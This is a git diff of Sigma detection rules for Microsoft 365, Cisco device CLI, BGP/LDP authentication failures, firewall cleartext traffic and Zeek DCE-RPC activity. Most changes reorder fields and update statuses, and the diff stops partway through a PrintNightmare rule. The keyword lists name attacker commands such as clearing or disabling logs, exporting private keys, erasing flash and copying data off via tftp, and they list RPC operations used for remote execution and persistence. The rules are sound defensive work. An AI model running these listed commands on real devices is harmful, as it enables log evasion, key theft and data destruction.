https://www.splunk.com/en_us/blog/security/a-golden-saml-journey-solarwinds-continued.html + - https://www.sygnia.co/golden-saml-advisory + - https://o365blog.com/post/aadbackdoor/ +author: Splunk Threat Research Team (original rule), '@ionsor (rule)' +date: 2022/02/08 +tags: + - attack.persistence + - attack.t1136.003 +logsource: + service: exchange + product: m365 +detection: + selection: + eventSource: Exchange + eventName: 'Add-FederatedDomain' + status: success + condition: selection +falsepositives: + - The creation of a new Federated domain is not necessarily malicious, however these events need to be followed closely, as it may indicate federated credential abuse or backdoor via federated identities at a similar or different cloud provider. +level: medium diff --git a/src/main/resources/rules/m365/microsoft365_pst_export_alert.yml b/src/main/resources/rules/m365/microsoft365_pst_export_alert.yml index 03c2e2309..0e05c502b 100644 --- a/src/main/resources/rules/m365/microsoft365_pst_export_alert.yml +++ b/src/main/resources/rules/m365/microsoft365_pst_export_alert.yml @@ -3,7 +3,7 @@ id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 related: - id: 6897cd82-6664-11ed-9022-0242ac120002 type: similar -status: experimental +status: test description: Alert on when a user has performed an eDiscovery search or exported a PST file from the search. This PST file usually has sensitive information including email body content references: - https://learn.microsoft.com/en-us/microsoft-365/compliance/alert-policies?view=o365-worldwide diff --git a/src/main/resources/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml b/src/main/resources/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml index 58e939a46..71405590f 100644 --- a/src/main/resources/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml +++ b/src/main/resources/rules/m365/microsoft365_pst_export_alert_using_new_compliancesearchaction.yml @@ -3,7 +3,7 @@ id: 6897cd82-6664-11ed-9022-0242ac120002 related: - id: 18b88d08-d73e-4f21-bc25-4b9892a4fdd0 type: similar -status: experimental +status: test description: Alert when a user has performed an export to a search using 'New-ComplianceSearchAction' with the '-Export' flag. This detection will detect PST export even if the 'eDiscovery search or exported' alert is disabled in the O365.This rule will apply to ExchangePowerShell usage and from the cloud. references: - https://learn.microsoft.com/en-us/powershell/module/exchange/new-compliancesearchaction?view=exchange-ps diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_clear_logs.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_clear_logs.yml index 2b1d1ff0d..e32eba875 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_clear_logs.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_clear_logs.yml @@ -2,27 +2,23 @@ title: Cisco Clear Logs id: ceb407f6-8277-439b-951f-e4210e3ed956 status: test description: Clear command history in network OS which is used for defense evasion +references: + - https://www.cisco.com/c/en/us/td/docs/switches/datacenter/nexus5000/sw/command/reference/sysmgmt/n5k-sysmgmt-cr/n5k-sm_cmds_c.html + - https://www.cisco.com/c/en/us/td/docs/ios/12_2sr/12_2sra/feature/guide/srmgtint.html#wp1127609 author: Austin Clark date: 2019/08/12 -modified: 2021/11/27 +modified: 2023/05/26 +tags: + - attack.defense_evasion + - attack.t1070.003 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'clear logging' - - 'clear archive' - condition: keywords -fields: - - src - - CmdSet - - User - - Privilege_Level - - Remote_Address + keywords: + - 'clear logging' + - 'clear archive' + condition: keywords falsepositives: - - Legitimate administrators may run these commands + - Legitimate administrators may run these commands level: high -tags: - - attack.defense_evasion - - attack.t1070.003 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_collect_data.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_collect_data.yml index a3c03bf52..a735063db 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_collect_data.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_collect_data.yml @@ -2,33 +2,30 @@ title: Cisco Collect Data id: cd072b25-a418-4f98-8ebc-5093fb38fe1a status: test description: Collect pertinent data from the configuration files +references: + - https://blog.router-switch.com/2013/11/show-running-config/ + - https://www.cisco.com/E-Learning/bulk/public/tac/cim/cib/using_cisco_ios_software/cmdrefs/show_startup-config.htm + - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/config-mgmt/configuration/15-sy/config-mgmt-15-sy-book/cm-config-diff.html author: Austin Clark date: 2019/08/11 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.discovery + - attack.credential_access + - attack.collection + - attack.t1087.001 + - attack.t1552.001 + - attack.t1005 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'show running-config' - - 'show startup-config' - - 'show archive config' - - 'more' - condition: keywords -fields: - - src - - CmdSet - - User - - Privilege_Level - - Remote_Address + keywords: + - 'show running-config' + - 'show startup-config' + - 'show archive config' + - 'more' + condition: keywords falsepositives: - - Commonly run by administrators + - Commonly run by administrators level: low -tags: - - attack.discovery - - attack.credential_access - - attack.collection - - attack.t1087.001 - - attack.t1552.001 - - attack.t1005 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml index 35510c62e..3485e200e 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_crypto_actions.yml @@ -2,30 +2,25 @@ title: Cisco Crypto Commands id: 1f978c6a-4415-47fb-aca5-736a44d7ca3d status: test description: Show when private keys are being exported from the device, or when new certificates are installed +references: + - https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-a1-cr-book_chapter_0111.html author: Austin Clark date: 2019/08/12 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.credential_access + - attack.defense_evasion + - attack.t1553.004 + - attack.t1552.004 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'crypto pki export' - - 'crypto pki import' - - 'crypto pki trustpoint' - condition: keywords -fields: - - src - - CmdSet - - User - - Privilege_Level - - Remote_Address + keywords: + - 'crypto pki export' + - 'crypto pki import' + - 'crypto pki trustpoint' + condition: keywords falsepositives: - - Not commonly run by administrators. Also whitelist your known good certificates + - Not commonly run by administrators. Also whitelist your known good certificates level: high -tags: - - attack.credential_access - - attack.defense_evasion - - attack.t1553.004 - - attack.t1552.004 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_disable_logging.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_disable_logging.yml index d90b34743..06711af29 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_disable_logging.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_disable_logging.yml @@ -2,27 +2,28 @@ title: Cisco Disabling Logging id: 9e8f6035-88bf-4a63-96b6-b17c0508257e status: test description: Turn off logging locally or remote +references: + - https://www.cisco.com/en/US/docs/ios/security/command/reference/sec_a2.pdf author: Austin Clark date: 2019/08/11 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.defense_evasion + - attack.t1562.001 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'no logging' - - 'no aaa new-model' - condition: keywords + keywords: + - 'no logging' + - 'no aaa new-model' + condition: keywords fields: - - src - - CmdSet - - User - - Privilege_Level - - Remote_Address + - src + - CmdSet + - User + - Privilege_Level + - Remote_Address falsepositives: - - Unknown + - Unknown level: high -tags: - - attack.defense_evasion - - attack.t1562.001 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_discovery.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_discovery.yml index 21f2741f0..5d6574067 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_discovery.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_discovery.yml @@ -2,44 +2,39 @@ title: Cisco Discovery id: 9705a6a1-6db6-4a16-a987-15b7151e299b status: test description: Find information about network devices that is not stored in config files +references: + - https://www.cisco.com/c/en/us/td/docs/server_nw_virtual/2-5_release/command_reference/show.html author: Austin Clark date: 2019/08/12 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.discovery + - attack.t1083 + - attack.t1201 + - attack.t1057 + - attack.t1018 + - attack.t1082 + - attack.t1016 + - attack.t1049 + - attack.t1033 + - attack.t1124 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'dir' - - 'show processes' - - 'show arp' - - 'show cdp' - - 'show version' - - 'show ip route' - - 'show ip interface' - - 'show ip sockets' - - 'show users' - - 'show ssh' - - 'show clock' - condition: keywords -fields: - - src - - CmdSet - - User - - Privilege_Level - - Remote_Address + keywords: + - 'dir' + - 'show arp' + - 'show cdp' + - 'show clock' + - 'show ip interface' + - 'show ip route' + - 'show ip sockets' + - 'show processes' + - 'show ssh' + - 'show users' + - 'show version' + condition: keywords falsepositives: - - Commonly used by administrators for troubleshooting + - Commonly used by administrators for troubleshooting level: low -tags: - - attack.discovery - - attack.t1083 - - attack.t1201 - - attack.t1057 - - attack.t1018 - - attack.t1082 - - attack.t1016 - - attack.t1049 - - attack.t1033 - - attack.t1124 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_dos.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_dos.yml index bdedcfc76..e2455a3bc 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_dos.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_dos.yml @@ -4,24 +4,23 @@ status: test description: Detect a system being shutdown or put into different boot mode author: Austin Clark date: 2019/08/15 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.impact + - attack.t1495 + - attack.t1529 + - attack.t1565.001 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'shutdown' - - 'config-register 0x2100' - - 'config-register 0x2142' - condition: keywords + keywords: + - 'shutdown' + - 'config-register 0x2100' + - 'config-register 0x2142' + condition: keywords fields: - - CmdSet + - CmdSet falsepositives: - - Legitimate administrators may run these commands, though rarely. + - Legitimate administrators may run these commands, though rarely. level: medium -tags: - - attack.impact - - attack.t1495 - - attack.t1529 - - attack.t1565.001 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_file_deletion.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_file_deletion.yml index 4e35a0dd1..beedf9793 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_file_deletion.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_file_deletion.yml @@ -4,25 +4,24 @@ status: test description: See what files are being deleted from flash file systems author: Austin Clark date: 2019/08/12 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.defense_evasion + - attack.impact + - attack.t1070.004 + - attack.t1561.001 + - attack.t1561.002 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'erase' - - 'delete' - - 'format' - condition: keywords + keywords: + - 'erase' + - 'delete' + - 'format' + condition: keywords fields: - - CmdSet + - CmdSet falsepositives: - - Will be used sometimes by admins to clean up local flash space + - Will be used sometimes by admins to clean up local flash space level: medium -tags: - - attack.defense_evasion - - attack.impact - - attack.t1070.004 - - attack.t1561.001 - - attack.t1561.002 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_input_capture.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_input_capture.yml index bf429a053..ccd20f84a 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_input_capture.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_input_capture.yml @@ -4,22 +4,21 @@ status: test description: See what commands are being input into the device by other people, full credentials can be in the history author: Austin Clark date: 2019/08/11 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.credential_access + - attack.t1552.003 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'show history' - - 'show history all' - - 'show logging' - condition: keywords + keywords: + - 'show history' + - 'show history all' + - 'show logging' + condition: keywords fields: - - CmdSet + - CmdSet falsepositives: - - Not commonly run by administrators, especially if remote logging is configured + - Not commonly run by administrators, especially if remote logging is configured level: medium -tags: - - attack.credential_access - - attack.t1552.003 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_local_accounts.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_local_accounts.yml index 4d579b008..678773565 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_local_accounts.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_local_accounts.yml @@ -4,22 +4,21 @@ status: test description: Find local accounts being created or modified as well as remote authentication configurations author: Austin Clark date: 2019/08/12 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.persistence + - attack.t1136.001 + - attack.t1098 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'username' - - 'aaa' - condition: keywords + keywords: + - 'username' + - 'aaa' + condition: keywords fields: - - CmdSet + - CmdSet falsepositives: - - When remote authentication is in place, this should not change often + - When remote authentication is in place, this should not change often level: high -tags: - - attack.persistence - - attack.t1136.001 - - attack.t1098 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_modify_config.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_modify_config.yml index dffc9bced..699678c94 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_modify_config.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_modify_config.yml @@ -4,31 +4,30 @@ status: test description: Modifications to a config that will serve an adversary's impacts or persistence author: Austin Clark date: 2019/08/12 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.persistence + - attack.impact + - attack.t1490 + - attack.t1505 + - attack.t1565.002 + - attack.t1053 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'ip http server' - - 'ip https server' - - 'kron policy-list' - - 'kron occurrence' - - 'policy-list' - - 'access-list' - - 'ip access-group' - - 'archive maximum' - condition: keywords + keywords: + - 'ip http server' + - 'ip https server' + - 'kron policy-list' + - 'kron occurrence' + - 'policy-list' + - 'access-list' + - 'ip access-group' + - 'archive maximum' + condition: keywords fields: - - CmdSet + - CmdSet falsepositives: - - Legitimate administrators may run these commands + - Legitimate administrators may run these commands level: medium -tags: - - attack.persistence - - attack.impact - - attack.t1490 - - attack.t1505 - - attack.t1565.002 - - attack.t1053 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_moving_data.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_moving_data.yml index 138a0f3d4..a5068ab1d 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_moving_data.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_moving_data.yml @@ -4,30 +4,29 @@ status: test description: Various protocols maybe used to put data on the device for exfil or infil author: Austin Clark date: 2019/08/12 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.collection + - attack.lateral_movement + - attack.command_and_control + - attack.exfiltration + - attack.t1074 + - attack.t1105 + - attack.t1560.001 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'tftp' - - 'rcp' - - 'puts' - - 'copy' - - 'configure replace' - - 'archive tar' - condition: keywords + keywords: + - 'tftp' + - 'rcp' + - 'puts' + - 'copy' + - 'configure replace' + - 'archive tar' + condition: keywords fields: - - CmdSet + - CmdSet falsepositives: - - Generally used to copy configs or IOS images + - Generally used to copy configs or IOS images level: low -tags: - - attack.collection - - attack.lateral_movement - - attack.command_and_control - - attack.exfiltration - - attack.t1074 - - attack.t1105 - - attack.t1560.001 diff --git a/src/main/resources/rules/network/cisco/aaa/cisco_cli_net_sniff.yml b/src/main/resources/rules/network/cisco/aaa/cisco_cli_net_sniff.yml index a6d646dd1..e5063d4dc 100644 --- a/src/main/resources/rules/network/cisco/aaa/cisco_cli_net_sniff.yml +++ b/src/main/resources/rules/network/cisco/aaa/cisco_cli_net_sniff.yml @@ -4,23 +4,22 @@ status: test description: Show when a monitor or a span/rspan is setup or modified author: Austin Clark date: 2019/08/11 -modified: 2021/11/27 +modified: 2023/01/04 +tags: + - attack.credential_access + - attack.discovery + - attack.t1040 logsource: - product: cisco - service: aaa - category: accounting + product: cisco + service: aaa detection: - keywords: - - 'monitor capture point' - - 'set span' - - 'set rspan' - condition: keywords + keywords: + - 'monitor capture point' + - 'set span' + - 'set rspan' + condition: keywords fields: - - CmdSet + - CmdSet falsepositives: - - Admins may setup new or modify old spans, or use a monitor for troubleshooting + - Admins may setup new or modify old spans, or use a monitor for troubleshooting level: medium -tags: - - attack.credential_access - - attack.discovery - - attack.t1040 diff --git a/src/main/resources/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml b/src/main/resources/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml new file mode 100644 index 000000000..c71615765 --- /dev/null +++ b/src/main/resources/rules/network/cisco/bgp/cisco_bgp_md5_auth_failed.yml @@ -0,0 +1,35 @@ +title: Cisco BGP Authentication Failures +id: 56fa3cd6-f8d6-4520-a8c7-607292971886 +status: test +description: Detects BGP failures which may be indicative of brute force attacks to manipulate routing +references: + - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf +author: Tim Brown +date: 2023/01/09 +modified: 2023/01/23 +tags: + - attack.initial_access + - attack.persistence + - attack.privilege_escalation + - attack.defense_evasion + - attack.credential_access + - attack.collection + - attack.t1078 + - attack.t1110 + - attack.t1557 +logsource: + product: cisco + service: bgp + definition: 'Requirements: cisco bgp logs need to be enabled and ingested' +detection: + keywords_bgp_cisco: + '|all': + - ':179' # Protocol + - 'IP-TCP-3-BADAUTH' + condition: keywords_bgp_cisco +fields: + - tcpConnLocalAddress + - tcpConnRemAddress +falsepositives: + - Unlikely. Except due to misconfigurations +level: low diff --git a/src/main/resources/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml b/src/main/resources/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml new file mode 100644 index 000000000..10800ba25 --- /dev/null +++ b/src/main/resources/rules/network/cisco/ldp/cisco_ldp_md5_auth_failed.yml @@ -0,0 +1,35 @@ +title: Cisco LDP Authentication Failures +id: 50e606bf-04ce-4ca7-9d54-3449494bbd4b +status: test +description: Detects LDP failures which may be indicative of brute force attacks to manipulate MPLS labels +references: + - https://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf +author: Tim Brown +date: 2023/01/09 +tags: + - attack.initial_access + - attack.persistence + - attack.privilege_escalation + - attack.defense_evasion + - attack.credential_access + - attack.collection + - attack.t1078 + - attack.t1110 + - attack.t1557 +logsource: + product: cisco + service: ldp + definition: 'Requirements: cisco ldp logs need to be enabled and ingested' +detection: + selection_protocol: + - 'LDP' + selection_keywords: + - 'SOCKET_TCP_PACKET_MD5_AUTHEN_FAIL' + - 'TCPMD5AuthenFail' + condition: selection_protocol and selection_keywords +fields: + - tcpConnLocalAddress + - tcpConnRemAddress +falsepositives: + - Unlikely. Except due to misconfigurations +level: low diff --git a/src/main/resources/rules/network/firewall/net_firewall_cleartext_protocols.yml b/src/main/resources/rules/network/firewall/net_firewall_cleartext_protocols.yml new file mode 100644 index 000000000..6bc0432ed --- /dev/null +++ b/src/main/resources/rules/network/firewall/net_firewall_cleartext_protocols.yml @@ -0,0 +1,89 @@ +title: Cleartext Protocol Usage +id: d7fb8f0e-bd5f-45c2-b467-19571c490d7e +status: stable +description: | + Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels. + Ensure that an encryption is used for all sensitive information in transit. Ensure that an encrypted channels is used for all administrative account access. +references: + - https://www.cisecurity.org/controls/cis-controls-list/ + - https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf + - https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf +author: Alexandr Yampolskyi, SOC Prime, Tim Shelton +date: 2019/03/26 +modified: 2022/10/10 +tags: + - attack.credential_access + # - CSC4 + # - CSC4.5 + # - CSC14 + # - CSC14.4 + # - CSC16 + # - CSC16.5 + # - NIST CSF 1.1 PR.AT-2 + # - NIST CSF 1.1 PR.MA-2 + # - NIST CSF 1.1 PR.PT-3 + # - NIST CSF 1.1 PR.AC-1 + # - NIST CSF 1.1 PR.AC-4 + # - NIST CSF 1.1 PR.AC-5 + # - NIST CSF 1.1 PR.AC-6 + # - NIST CSF 1.1 PR.AC-7 + # - NIST CSF 1.1 PR.DS-1 + # - NIST CSF 1.1 PR.DS-2 + # - ISO 27002-2013 A.9.2.1 + # - ISO 27002-2013 A.9.2.2 + # - ISO 27002-2013 A.9.2.3 + # - ISO 27002-2013 A.9.2.4 + # - ISO 27002-2013 A.9.2.5 + # - ISO 27002-2013 A.9.2.6 + # - ISO 27002-2013 A.9.3.1 + # - ISO 27002-2013 A.9.4.1 + # - ISO 27002-2013 A.9.4.2 + # - ISO 27002-2013 A.9.4.3 + # - ISO 27002-2013 A.9.4.4 + # - ISO 27002-2013 A.8.3.1 + # - ISO 27002-2013 A.9.1.1 + # - ISO 27002-2013 A.10.1.1 + # - PCI DSS 3.2 2.1 + # - PCI DSS 3.2 8.1 + # - PCI DSS 3.2 8.2 + # - PCI DSS 3.2 8.3 + # - PCI DSS 3.2 8.7 + # - PCI DSS 3.2 8.8 + # - PCI DSS 3.2 1.3 + # - PCI DSS 3.2 1.4 + # - PCI DSS 3.2 4.3 + # - PCI DSS 3.2 7.1 + # - PCI DSS 3.2 7.2 + # - PCI DSS 3.2 7.3 +logsource: + category: firewall +detection: + selection: + dst_port: + - 8080 + - 21 + - 80 + - 23 + - 50000 + - 1521 + - 27017 + - 3306 + - 1433 + - 11211 + - 15672 + - 5900 + - 5901 + - 5902 + - 5903 + - 5904 + selection_allow1: + action: + - forward + - accept + - 2 + selection_allow2: + blocked: "false" # not all fws set action value, but are set to mark as blocked or allowed or not + condition: selection and 1 of selection_allow* +falsepositives: + - Unknown +level: low diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml index 188fcef8b..ec3b2988a 100644 --- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml +++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml @@ -2,52 +2,52 @@ title: MITRE BZAR Indicators for Execution id: b640c0b8-87f8-4daa-aef8-95a24261dd1d status: test description: 'Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE' -author: '@neu5ron, SOC Prime' references: - - https://github.com/mitre-attack/bzar#indicators-for-attck-execution + - https://github.com/mitre-attack/bzar#indicators-for-attck-execution +author: '@neu5ron, SOC Prime' date: 2020/03/19 modified: 2021/11/27 +tags: + - attack.execution + - attack.t1047 + - attack.t1053.002 + - attack.t1569.002 logsource: - product: zeek - service: dce_rpc + product: zeek + service: dce_rpc detection: - op1: - endpoint: 'JobAdd' - operation: 'atsvc' - op2: - endpoint: 'ITaskSchedulerService' - operation: 'SchRpcEnableTask' - op3: - endpoint: 'ITaskSchedulerService' - operation: 'SchRpcRegisterTask' - op4: - endpoint: 'ITaskSchedulerService' - operation: 'SchRpcRun' - op5: - endpoint: 'IWbemServices' - operation: 'ExecMethod' - op6: - endpoint: 'IWbemServices' - operation: 'ExecMethodAsync' - op7: - endpoint: 'svcctl' - operation: 'CreateServiceA' - op8: - endpoint: 'svcctl' - operation: 'CreateServiceW' - op9: - endpoint: 'svcctl' - operation: 'StartServiceA' - op10: - endpoint: 'svcctl' - operation: 'StartServiceW' - condition: 1 of op* + op1: + endpoint: 'JobAdd' + operation: 'atsvc' + op2: + endpoint: 'ITaskSchedulerService' + operation: 'SchRpcEnableTask' + op3: + endpoint: 'ITaskSchedulerService' + operation: 'SchRpcRegisterTask' + op4: + endpoint: 'ITaskSchedulerService' + operation: 'SchRpcRun' + op5: + endpoint: 'IWbemServices' + operation: 'ExecMethod' + op6: + endpoint: 'IWbemServices' + operation: 'ExecMethodAsync' + op7: + endpoint: 'svcctl' + operation: 'CreateServiceA' + op8: + endpoint: 'svcctl' + operation: 'CreateServiceW' + op9: + endpoint: 'svcctl' + operation: 'StartServiceA' + op10: + endpoint: 'svcctl' + operation: 'StartServiceW' + condition: 1 of op* falsepositives: - - Windows administrator tasks or troubleshooting - - Windows management scripts or software + - Windows administrator tasks or troubleshooting + - Windows management scripts or software level: medium -tags: - - attack.execution - - attack.t1047 - - attack.t1053.002 - - attack.t1569.002 diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml index 99f97de0b..a5bbc4c1a 100644 --- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml +++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml @@ -2,38 +2,38 @@ title: MITRE BZAR Indicators for Persistence id: 53389db6-ba46-48e3-a94c-e0f2cefe1583 status: test description: 'Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.' -author: '@neu5ron, SOC Prime' references: - - https://github.com/mitre-attack/bzar#indicators-for-attck-persistence + - https://github.com/mitre-attack/bzar#indicators-for-attck-persistence +author: '@neu5ron, SOC Prime' date: 2020/03/19 modified: 2021/11/27 +tags: + - attack.persistence + - attack.t1547.004 logsource: - product: zeek - service: dce_rpc + product: zeek + service: dce_rpc detection: - op1: - endpoint: 'spoolss' - operation: 'RpcAddMonitor' - op2: - endpoint: 'spoolss' - operation: 'RpcAddPrintProcessor' - op3: - endpoint: 'IRemoteWinspool' - operation: 'RpcAsyncAddMonitor' - op4: - endpoint: 'IRemoteWinspool' - operation: 'RpcAsyncAddPrintProcessor' - op5: - endpoint: 'ISecLogon' - operation: 'SeclCreateProcessWithLogonW' - op6: - endpoint: 'ISecLogon' - operation: 'SeclCreateProcessWithLogonExW' - condition: 1 of op* + op1: + endpoint: 'spoolss' + operation: 'RpcAddMonitor' + op2: + endpoint: 'spoolss' + operation: 'RpcAddPrintProcessor' + op3: + endpoint: 'IRemoteWinspool' + operation: 'RpcAsyncAddMonitor' + op4: + endpoint: 'IRemoteWinspool' + operation: 'RpcAsyncAddPrintProcessor' + op5: + endpoint: 'ISecLogon' + operation: 'SeclCreateProcessWithLogonW' + op6: + endpoint: 'ISecLogon' + operation: 'SeclCreateProcessWithLogonExW' + condition: 1 of op* falsepositives: - - Windows administrator tasks or troubleshooting - - Windows management scripts or software + - Windows administrator tasks or troubleshooting + - Windows management scripts or software level: medium -tags: - - attack.persistence - - attack.t1547.004 diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml index 489e3932c..3ff369979 100644 --- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml +++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml @@ -1,18 +1,19 @@ title: Potential PetitPotam Attack Via EFS RPC Calls id: 4096842a-8f9f-4d36-92b4-d0b2a62f9b2a +status: test description: | Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam. The usage of this RPC function should be rare if ever used at all. Thus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate. View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..' -status: experimental -author: '@neu5ron, @Antonlovesdnb, Mike Remen' -date: 2021/08/17 references: - - https://github.com/topotam/PetitPotam/blob/main/PetitPotam/PetitPotam.cpp + - https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp - https://msrc.microsoft.com/update-guide/vulnerability/ADV210003 - https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf - https://threatpost.com/microsoft-petitpotam-poc/168163/ +author: '@neu5ron, @Antonlovesdnb, Mike Remen' +date: 2021/08/17 +modified: 2022/11/28 tags: - attack.t1557.001 - attack.t1187 @@ -21,13 +22,8 @@ logsource: service: dce_rpc detection: selection: - operation|startswith: - - 'Efs' - - 'efs' + operation|startswith: 'efs' condition: selection -falsepositives: - - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description). -level: medium fields: - id.orig_h - id.resp_h @@ -36,3 +32,6 @@ fields: - endpoint - named_pipe - uid +falsepositives: + - Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description). +level: medium diff --git a/src/main/resources/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml b/src/main/resources/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml index b0cdb547f..1f7862a81 100644 --- a/src/main/resources/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml +++ b/src/main/resources/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml @@ -1,19 +1,23 @@ title: Possible PrintNightmare Print Driver Install id: 7b33baef-2a75-4ca3-9da4-34f9a15382d8 +related: + - id: 53389db6-ba46-48e3-a94c-e0f2cefe1583 + type: derived +status: stable description: | Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675). The occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy. 